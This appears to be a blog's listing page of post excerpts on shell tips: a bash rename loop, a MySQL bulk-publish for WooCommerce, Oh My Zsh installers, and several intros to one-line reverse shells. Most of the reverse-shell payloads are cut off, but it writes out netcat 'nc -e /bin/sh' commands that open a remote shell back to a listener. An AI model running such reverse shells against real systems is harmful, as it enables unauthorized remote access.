For a very long time, Microsoft Windows did not ship with Powershell. In fact, it did not ship with any kind of shell and all.
So, when Windows users would ask me about Linux, or any other operating systems, that was one of the main things I would point out to them. At least, if they were “tech savvy”, the raw power of having a shell versus “just a command prompt”. And how scripting in the command line, on the fly is invaluable. I’m sure it’s invaluable everywhere, but I found it especially invaluable in the security world
Here’s a one line command to create a “for loop” and execute that command on each file found in a particular folder:
for i in *;mv "$i" "$i.conf"; done
Yup, it’s that easy in BASH.
The above command will iterate (duh) the ‘move file’ command and append ‘.conf’ to the end of the filename, by “moving” those files to the same folder but with .conf added to their name. Yes, it does essentially just rename them.
So, it’s been a little while, since I shared some one line reverse shells with you guys. Here are a few “obscure” ones, if you ever find the need for them. I do not recommend bothering with the remote Xsessions. But, to each their own.
Xterm One Line Reverse Shell
You’ll need to listen on port 6001 using a tool like xnest, try xnest :1 and then:
How to Post Thousands of Products on WordPress Instantly
Importing large amounts of product data into WordPress / WooCommerce can be a daunting task. Here’s how you can instantly publish thousands products on WooCommerce using the terminal.
mysql -u dbuser -p dbname
update wp_posts set `post_status` = 'publish' where `post_type` = 'product';
SQL databases are awesome! That’s right, and you can simply change ‘publish’ to ‘draft’ to delist thousands of products as well. You should take a look through wp_postmeta and see all the various meta keys you can use to filter products and work with your catalog through the command line. It’ll save you time and money.
Let’s spawn a few perl reverse shells, in various environments. Why? Because Perl is that diverse.
Perl Reverse Shells
If you’re just getting into writing code, python comes heavily recommended. But, if code auditing is something you’re wanting to get into, jumping straight into perl might be more beneficial. And, yes, these are all built to be executed on a single line.
Reverse shells communicate in plaintext, by default. Telnet isn’t often installed by default any more. But, if it does exist on your target system, here are two one liners you can use to spawn a reverse shell with telnet.
Jeet Kune Crypto: One Line Reverse Shells with Scripting Languages
Reverse shells are extremely useful for subverting firewalls or other security mechanisms that may block new opened ports. Often you’ll find hosts already have several scripting languages installed. We’re going to take advantage of the some of the most popular of those languages, to spawn a reverse shell.
In these scenarios, your listening IP is 172.16.16.1 and your listening port is 1234.
Python Reverse Shell:
This python one line reverse shell is kind of a trip. Trust me, nobody expects you to remember this one, off of the top of your head.
One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.
While traditional backdoors wait for you to connect (which netcat can also do). Here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:
Versions that support "-e":
nc -e "/bin/sh" <target> <target port>
nc -e "cmd.exe" <target> <target port>
If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:
Oh My Zsh is a delightful, open source, community-driven framework for managing your Zsh configuration. It comes bundled with thousands of helpful functions, helpers, plugins, themes, and a few things that make you shout…
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
sh -c "$(curl -fsSL https://raw.github.com/ohmybash/oh-my-bash/master/tools/install.sh)"
Typically what you get with "Oh-My-BASH" is going to be a prettier prompt and a slightly more robust command completion. However, if you happen to use the various services which already have plugins, you'll find it even more useful. For example, I often have clients that need help with Amazon AWS and that plugin speeds up several tasks for me. You mileage will vary, but keep in mind that you can write your own plugins as well. The main reason I linked it and promoted it is that I'd like to see the project succeed. Personally, I tend to favor ZSH on linux and also stick with CSH on BSD. However, like everyone else, I tend to be in a BASH environment when I log into client machines.